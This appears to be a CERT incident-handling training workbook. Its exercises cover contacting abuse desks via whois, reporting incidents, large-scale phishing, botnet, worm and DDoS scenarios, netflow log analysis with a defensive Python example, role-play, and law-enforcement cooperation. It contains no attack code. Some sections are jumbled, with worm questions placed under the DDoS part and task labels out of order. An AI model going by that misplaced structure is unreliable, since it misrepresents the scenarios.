    The goal of this exercise is to enhance your skills in establishing contacts with other CERTs, administrators of ISPs and other parties responsible for the mitigation of security incidents in their networks around the globe. You will be asked to identify and contact the proper authorities about real incidents. After finishing the exercise, you should be able to establish and develop networks of contacts faster and more effectively.

    Session One

    You have received a number of logs indicating remote attacks. Your task will be to inform administrators of the networks causing these attacks about the problem and ask them to mitigate it. Begin with identifying the right contacts.

    We suggest starting with querying the whois databases of the regional Internet registries (RIRs). They keep information about the network providers assigned a given range of IP addresses. In turn, the providers can usually make the information more granular by adding information about subnets and their networks. Note that each regional registry has its own separate database which covers the address space administered by that registry. Currently, there are five regional Internet registries:

    ARIN: American Registry for Internet Numbers (http://www.arin.net/) covers North America and parts of the Caribbean;
    RIPE NCC (http://www.ripe.net/) for Europe, the Middle East and Central Asia;
    APNIC: Asia-Pacific Network Information Centre (http://www.apnic.net) for Asia and the Pacific;
    LACNIC: Latin American and Caribbean Internet Address Registry (http://www.lacnic.net/) for Latin America and parts of the Caribbean; and
    AfriNIC: African Network Information Centre (http://www.afrinic.net/) for Africa.

    The registries offer whois services via web interfaces and standard whois protocol.

    Since it is not possible to determine which RIR to ask just by looking at the IP address (or at least not without sufficient prior experience), numerous services exist which can do this for you by querying multiple servers to find the correct one. One of the services we recommend for this is Domain Dossier from CentralOps.net, located at http://centralops.net/co/DomainDossier.aspx. While this service offers multiple other functionalities, for the time being we settle for the network whois lookup. Look for contacts listed in cert-nfy (RIPE, APNIC), tech-c, OrgAbuseEmail (ARIN) or similar, as well as for any contacts the server refers to directly as abuse.


    Another approach is to use the domain name and the user contact information for the domain. Note that this can be much less accurate, because:

    many institutions can get network or hosting services from a single provider and so do not bother to have reverse DNS entries, thus sharing a single provider's domain; in many cases they will, however, have different entries in RIR whois databases;
    the domain name system is hierarchical and sometimes the different levels of a domain name can be confused; and
    some domain registries hide pieces of information that are considered private and protected by local law (eg, the name and last name of a private person can be treated as personal data).

    Note that, in any case, going after the domain owner should eventually bring you to the person responsible for a particular host; in the worst case, they should be able to redirect you one hop further, but usually it takes longer than going from the network provider's end.

    When looking up the domain owner, do not confuse registrar with registrant. Although the terms sound similar, the first one is actually the organisation where the domain was registered, while the latter is the domain owner.

    Contact information for a domain is kept in a domain whois database, a separate one for each top-level domain. Most registries provide lookup tools for their databases via a web frontend and sometimes also via a standard whois interface. The quality and format of the information returned varies greatly. Again, Domain Dossier has a tool that does lookups at the appropriate servers for you (when available). This time use the domain whois record feature.

    Yet another way to look for administrative contacts is to look for a web page of the company. You may try entering the hostname into the browser directly or guess the name by adding www to various parts of the domain name. For example, for a hostname melkor.nask.waw.pl you would be successful with www.nask.waw.pl.

    Warning! When visiting unknown web pages, consider using a disposable system, eg, a virtual machine which you do not mind getting infected. This is especially true when visiting potentially infected sites.

    Once you find the web page, try to find out what kind of a company you are dealing with. Is it a hosting provider? An ISP? If you find yourself at either of these, you will probably look for an abuse department or a network operating centre of some kind and ask them to provide the customer's data or relay your information to him. If you stumble across an online store, or other site which does not seem to provide further network services, you have probably found the customer yourself. Just look for any contact information on the web page.

    Last, but not least, consider passing the information on to a local CERT. CERTs have proved to be successful in getting to the right people by knowing the local situation, language and culture. Usually they have also built up a tight local network of trusted contacts that you may not be able to reach otherwise. If you are unable to locate the IRT contact in the RIPE or APNIC databases, you may want to use one of the lists of CERT teams:

    http://www.first.org/members/teams/index.html - members of the Forum of Incident Response and Security Teams, the global forum for CERTs (sorted alphabetically);
    http://www.trusted-introducer.nl/teams/country_LICSA.html - a list of recognised European CERTs, maintained by Trusted Introducer (sorted by country);
    http://www.egc-group.org/ - European Government CERTs Group;
    http://enisa.europa.eu/doc/pdf/deliverables/cert_inventory_v1_4.pdf - Inventory of CERT activities in Europe by ENISA; and
    http://www.apcert.org/about/structure/members.html - members of APCERT, a forum of CERTs from the Asia-Pacific region.


    Note the different constituencies of different CERT teams. Although some teams have country-wide responsibility and will be happy to accept and relay information about malicious activity anywhere in their country, some are limited to government or military institutions or even single companies or universities.

    Whenever possible, try to make notes of phone numbers too.

    When you have finished gathering contact information, consult with the trainer and other students.

    Your next step is to write formal incident reports to the addresses you have found and send them by e-mail. You should start the report by identifying yourself and the company and/or team you are working for. You may skip this only when you have long-established and informal relationships with the recipient, but do not do so for the sake of this exercise. The report should also contain:

    a clear description of the attack and what you think caused it;
    evidence of the attack: log samples including detailed time information, full e-mail with headers, etc; and
    a request for actions: you should state clearly what you want the recipient to do (eg, stop the customer from carrying out further abuse, take down an offending host, etc).

    Once you have prepared the report, discuss it with the trainer.

    If you have PGP/GPG available, always sign your mail. Note that encryption is not necessary unless you are sending sensitive information such as a cracked password, strings to access a vulnerable site, etc. Also, you would need to have a public key for the recipient or agree with him or her on a pass-phrase for symmetric encryption beforehand.

    After hitting the Send button, you are done with the first session, but not done with your exercise. Ask the teacher for the details of the second session, when you will discuss the results. Until then, make sure you monitor your mailbox, reply to any inquiries you may receive from the administrators if you can, and take notes of any responses, tracking numbers, etc, you may receive.

    Session Two

    Share your experience from the contacts:

    How many e-mails did you send?
    How many replies did you get?
    What kinds of replies did you get: automated, personalised, asking for clarification, or confirming resolution?
    How much time did it usually take to get a reply back?
    In how many cases do you believe you managed to resolve the incident?
    In cases where you did not receive any reply, what do you think was the reason?

    Discuss your findings and opinions with the other students and the teacher.

    In some cases, the teacher might ask you to follow up with a phone call. Do you still have the numbers you noted?


    Exercise 9: Large-scale Incident Handling

    EXERCISE TASKS

    WHAT WILL YOU LEARN?

    The purpose of this exercise is to introduce you to the way large-scale incidents can be handled. You will face different scenarios, presented by the trainer. For each scenario, follow carefully what the trainer has to say. The trainer will explain a certain initial situation and you will be asked to suggest ways of moving forward. To help you, the trainer will pose leading questions. Answering the questions will move you to the next phase of the scenario, until you arrive at the final solution.

    PART 1 LARGE-SCALE PHISHING ATTACK

    This exercise is meant to be carried out with the help of the trainer. At the beginning, you will be given a short overview of what phishing is. The trainer will then present a scenario to you. The scenario will be resolved through a series of steps (tasks).

    Source of information

    What are your possible sources for obtaining information about phishing incidents?

    Task 1

    Initial investigation

    What would be your first steps in tackling a reported phishing incident?

    Task 2

    Take down

    How would you organise the takedown of the phishing site? What are the possible obstacles?

    Task 3

    Warning & Mitigation

    How would you go about warning victims? What steps could be taken, other than organising a takedown, to mitigate the problem?

    Task 4

    PART 2 LARGE BOTNET SPREADING THROUGH A NEW VULNERABILITY

    You have gained some experience on how to handle large-scale phishing attacks. Now you are faced with a large botnet which is blasting through your network using some new vulnerability you have never heard of. The trainer will introduce some more details to you. As in the previous example, you should resolve the incident through the tasks listed below. The trainer will be there to help you, answering your questions so that you may proceed to the next task. Try to enumerate as many possible variants as you can think of.

    Source of information

    What are your possible sources for obtaining information about new botnets and vulnerabilities? What services could you use to monitor networks and acquire information about network events?

    Task 1


    PART 3 INTERNAL WORM OUTBREAK

    This scenario deals with a different case from the two previous scenarios. Those involved handling incidents external to a CERT. But what if an attack is happening in the network of a corporate CERT?

    In this scenario, the trainer will:

    present you with a hypothetical scenario of a worm entering a corporate network;
    present a diagram (below) of a hypothetical organisation's network;
    give general information about the initial situation; and
    guide you in a step-by-step manner, by providing leading questions to help you understand what is happening and how to resolve the situation.

    The network topology looks like the following:

    Initial investigation

    What would be your first steps in tackling such a situation?

    Task 2

    Take down

    How would you organise the takedown of a controller? What are the possible obstacles?

    Task 3

    Warning & Mitigation

    How would you go about warning victims? What steps could be taken, other than organising a takedown, to mitigate the problem?

    Task 4


    Perform the following tasks, enumerating all the possible variants of the problem you can think of. How would you resolve the situation? Again, the trainer will provide you with leading questions.

    PART 4 LARGE SCALE DDoS ATTACKS AGAINST THE ENTIRE COUNTRY

    This part of the exercise is devoted particularly to developing your skills and ideas on handling large-scale, country-wide DDoS attacks. You will learn how to prepare the attack defence strategy, undertake appropriate actions and overcome various types of difficulties at different levels, both technical and organisational.

    Your ideas for Phase I

    Possible source of attack

    Where could the attack have come from?

    Task 1

    Type of attack

    How does the worm spread?

    Task 2

    Malware capture and analysis

    How could you capture and analyse the worm?

    Task 3

    Worm controller identification

    How could you determine if this worm has a controller and adds infected hosts to a botnet?

    Task 4

    Case study: hypothetical cyber attack against country X

    You will receive a case study which describes some hypothetical cyber attack against country X. Your task is to prepare the defence strategy for this cyber attack. Think about the consequences of the situations described and the potential difficulties a CERT could face. Explain the motivation for the actions you propose. You have 45 minutes to complete this task. Be prepared to present your ideas to the whole group.

    Use the following form to prepare your strategy.

    Task 1


    Your ideas for Phase II

    Your ideas for Phase III

    Present and discuss your ideas with the others.

    Defence procedure (You are your CERT)


    Another perspective: your country is under cyber attack

    Imagine a similar attack occurs against your country or happens to your constituency. What would be your actions? Develop a basic defence procedure for your CSIRT team.

    Task 2

    Analysis of a particular DDoS method

    You will receive a description of a DDoS attack. Your task will be to give ideas about the types of analytical methods and actions which can be used to defend against it.

    Task 3

    Lesson learnt

    Think about how to be better prepared to defend against future large-scale attacks. Consider issues connected to prevention, preparedness and sustainability.

    Task 4


    Exercise 10: Automation in Incident Handling

    WHAT WILL YOU LEARN?

    Sometimes information about an incident, particularly about a widespread incident, is received in bulk, containing not just data about your networks but from all networks. This can be the case when a site under a DDoS attack shares its logs without time to sort and separate them for individual ISPs, look for contacts, etc. Having one-to-many distribution channels at hand, such as mailing lists, they can efficiently publish information for everyone to analyse.

    On the other hand, sometimes you have plenty of information collected from your own sources which you wish to share with others, distributing it on a need-to-know basis. An example can be logs from IPS systems, early warning systems, etc. While you observe attacks from all around the world, you may have a few interested parties who want to receive and handle reports about their networks. In such cases you need to sort the information out.

    Can you think of other situations where automation and scripting may help you?

    You can find a lot of lightweight, useful tools in the standard Linux shell. Some of the most commonly used are:

    cat: concatenate files and print on the standard output
    head: output the first part of files
    tail: output the last part of files
    grep, egrep: print lines matching a pattern
    sort: sort lines of text files
    cut: remove sections from each line of files
    awk: pattern scanning and processing language
    netcat: reads and writes data across network connections

    Their documentation is available by typing man command_name at the command prompt.

    For more advanced processing you can use powerful programming languages like python and perl, with lots of ready text-manipulation routines.

    This exercise will let you practise your skills in the fast, automated or semi-automated analysis of logs and guide you through some tools that can be useful in these tasks.

    The text file 24022007.txt contains netflow logs from a DDoS attack. Although this is a UDP flood to various ports and the source hosts are probably spoofed, you may decide to verify whether this traffic was observed at origin, and you happen to have good contacts with CERT teams in Poland and Turkey.

    The log file format is as follows (columns separated with whitespace):

    Column  Description
    1       Date
    2       Time
    3       Duration
    4       Protocol
    5       Source IP address:port
    6       ->
    7       Destination IP address:port
    8       Number of packets transmitted
    9       Number of bytes transmitted
    10      Number of aggregated flows


    Use the tools to dig some useful information out of this bulk data.

    Hints: sort offers an option to remove repeated lines from output. You can count lines, characters, etc, in a text file with wc.

    A detailed description of the service is available at http://www.team-cymru.org/Services/ip-to-asn.html and additional instructions can be obtained with a command:

    $ whois -h whois.cymru.com help

    Make sure you read the instructions and policies published on the webpage.

    Hints: Use a bulk query over the whois protocol. You will need to enable the display of the country codes in the output.


    Locating unique interesting hosts

    Generate a list of unique attacking IP addresses. How many distinct source hosts were taking part in the attack? (Assume that attacking packets = UDP packets.)

    Task 1

    Geolocation

    Team Cymru (http://www.team-cymru.com/) offers an IP to ASN mapping service. Use this service to find attacking IP addresses assigned to Poland and Turkey.

    Task 2

    Looking further

    While the attack consists of UDP packets to (apparently) random high ports, there are some other flows that stand out. Can you find them?

    Task 3
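As an added example (not code from the toolset), the Task 1 and Task 3 analysis done in Python instead of a grep | cut | sort -u pipeline, over a few constructed records in the ten-column format described above; it also produces the per-source profile (fixed source port, many destination ports, constant packet size) that the DDoS analysis in Exercise 7 arrived at with nfdump. The "stand-out" criterion (anything that is not UDP to a port of 1024 or higher) is an assumption, not a value from the exercise.

```python
from collections import defaultdict
from dataclasses import dataclass
from ipaddress import ip_address


@dataclass(frozen=True)
class Flow:
    """One record of the ten-column netflow text format described above."""
    date: str
    time: str
    duration: float
    proto: str
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int
    packets: int
    bytes: int
    flows: int


def parse_flow_line(line: str) -> Flow:
    """Split one whitespace-separated record; column 6 must be the literal '->'."""
    fields = line.split()
    if len(fields) != 10 or fields[5] != "->":
        raise ValueError(f"unexpected record layout: {line!r}")
    src_ip, _, src_port = fields[4].rpartition(":")   # 'ip:port' -> ip, port
    dst_ip, _, dst_port = fields[6].rpartition(":")
    return Flow(fields[0], fields[1], float(fields[2]), fields[3],
                src_ip, int(src_port), dst_ip, int(dst_port),
                int(fields[7]), int(fields[8]), int(fields[9]))


def parse_log(text: str) -> list[Flow]:
    return [parse_flow_line(line) for line in text.splitlines() if line.strip()]


def unique_attackers(flows: list[Flow]) -> list[str]:
    """Task 1: distinct source IPs, treating every UDP flow as attack traffic
    (the task's stated assumption; the DNS query in the sample shows how that
    assumption over-counts)."""
    return sorted({f.src_ip for f in flows if f.proto == "UDP"}, key=ip_address)


def standout_flows(flows: list[Flow], min_high_port: int = 1024) -> list[Flow]:
    """Task 3: everything that does not fit 'UDP to a random high port'.
    The port threshold is an assumption for this example."""
    return [f for f in flows if f.proto != "UDP" or f.dst_port < min_high_port]


def attack_profile(flows: list[Flow]) -> dict[str, dict]:
    """Per UDP source: source ports used, distinct destination ports hit and
    average packet size, the three properties the DDoS analysis concluded on."""
    per_src = defaultdict(lambda: {"src_ports": set(), "dst_ports": set(),
                                   "packets": 0, "bytes": 0})
    for f in flows:
        if f.proto != "UDP":
            continue
        rec = per_src[f.src_ip]
        rec["src_ports"].add(f.src_port)
        rec["dst_ports"].add(f.dst_port)
        rec["packets"] += f.packets
        rec["bytes"] += f.bytes
    return {
        ip: {"src_ports": sorted(r["src_ports"]),
             "distinct_dst_ports": len(r["dst_ports"]),
             "bytes_per_packet": r["bytes"] / r["packets"]}
        for ip, r in per_src.items()
    }


# Constructed sample records (not the exercise's 24022007.txt). The attacker
# and victim addresses are the ones named in the Exercise 7 DDoS analysis; the
# TCP and port-53 rows stand in for the "other flows that stand out".
SAMPLE_LOG = """\
2007-02-24 04:00:01.102 0.000 UDP 33.106.25.243:1024 -> 195.88.49.121:40213 1 29 1
2007-02-24 04:00:01.118 0.000 UDP 33.106.25.243:1024 -> 195.88.49.121:50871 1 29 1
2007-02-24 04:00:01.130 0.000 UDP 207.39.221.61:1024 -> 195.88.49.121:3322 1 29 1
2007-02-24 04:00:01.151 0.000 UDP 213.63.169.117:1024 -> 195.88.49.121:61000 1 29 1
2007-02-24 04:00:01.160 0.000 UDP 33.106.25.243:1024 -> 195.88.49.121:12780 1 29 1
2007-02-24 04:00:02.004 0.012 TCP 192.0.2.10:51234 -> 195.88.49.121:80 6 812 1
2007-02-24 04:00:02.410 0.000 UDP 198.51.100.7:4000 -> 195.88.49.121:53 1 64 1
"""

if __name__ == "__main__":
    flows = parse_log(SAMPLE_LOG)
    print("unique UDP sources:", unique_attackers(flows))
    for f in standout_flows(flows):
        print("stands out:", f.proto, f"{f.src_ip}:{f.src_port} -> {f.dst_ip}:{f.dst_port}")
    for ip, prof in attack_profile(flows).items():
        print(ip, prof)
```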


    Exercise 11: Incident Handling in Live Role Playing

    WHAT WILL YOU LEARN?

    EXERCISE TASKS

    This is a role-playing game that will take you into the world of incident handling. Doesn't sound like much fun? Well, it depends on you, as you will have a lot of freedom in developing the scenario and taking turns in the actions. Try to be as interactive as possible.

    You will receive a small note with a personal description of your character. This is for your eyes only! If you decide to take some action (eg, call someone), ask the game master for permission. He has the power to give or take back any information, fast-forward or rewind time, and influence your decisions. However, keep in mind that you should not try to speculate on the decisions of other players and vice versa: you should not let others decide for you (unless they are your bosses, of course).

    You can exchange information with other characters by meeting them face to face, making calls, sending e-mails, etc. Just describe what you are doing and interact with your partner. Remember that you cannot use any information that you heard when other characters talked unless your character was in the same room; the same rule applies to the other participants.

    At the end of the game you will be asked to share your opinions, so keep them for then. You can make notes on how you would proceed if you knew something in advance or if you were playing another character, and share them with everyone later.

    This exercise is designed to introduce you to many different layers and aspects of incident handling, including but not limited to:

    interaction with end-users;
    interaction with administrators;
    vulnerability handling; and
    talking to the management.

    It should help you to get into other people's shoes, understand their needs and expectations during the incident handling process and improve your communications with different actors.


    What would you do in cases involving:
    a) a denial of service attack,
    b) phishing, and
    c) cyber defamation?

    1. What kind of information should the LEA provide you with?
    2. How could you identify the source of the crime?
    3. What could you advise the LEA to do?

    Below are some examples of queries from an LEA:

    The LEA asks you to establish the owner of an e-mail address.
    The LEA sends you a letter without the return address.
    The LEA asks questions without proper authorisation or an appropriate signature.
    The LEA asks for a list of log entries that could help identify users connecting to the Internet using a computer with an IP address xxxx.
    The LEA asks for the identity of the user who was assigned IP address xxxx during a specific period of time a few years ago.
    The LEA asks for log entries containing a list of all connections established on a particular day.

    Think about proposals for CERT training for an LEA which would decrease the number of such questions.


    CERT advises an incident reporter in a cyber crime case

    Read the following descriptions of three incidents reported to a CERT:

    A user reports that he receives e-mails with viruses from one particular address. (The reporter suspects that they are sent on purpose.) The reporter provides the details of his mailbox (login and password) with a request for it to be checked with the CERT's help.

    A server administrator at the University reports that its web server (IP given) has become the target of a massive DDoS attack. The number of connections from the attacking hosts exceeded 35,000 in the first days, but on that day the attacks were boosted and occurred 4 times a day for 2 to 3.5 hours each time, and the number of connections (recorded in firewall logs) was more than 130,000. The total number of attacking hosts was probably more than 1,000. They had already blocked about 450 of the attacking networks. In most cases, attacks originated from networks in France, the Netherlands and Germany.

    A bank reports that it has been informed that there is a website hosted by some company which is involved in a phishing scheme to obtain personal account information from the customers of this bank.

    Write separate instructions for the victims of these incidents, including your advice and an explanation of how to report the incidents to an LEA.

    Task 2

    CERT advises LEA in a cyber crime case

    The trainer asks you what kind of aspects should be addressed in cooperation with an LEA. Then, he or she asks you to think about what a CERT could advise when it receives a call from an LEA regarding a case of suspected cyber crime.

    Task 3

    CERT prepares training for LEA

    The trainer asks you to think about proposals for CERT training for an LEA. What kind of training will it be? What kind of advice should this training contain?

    Task 4
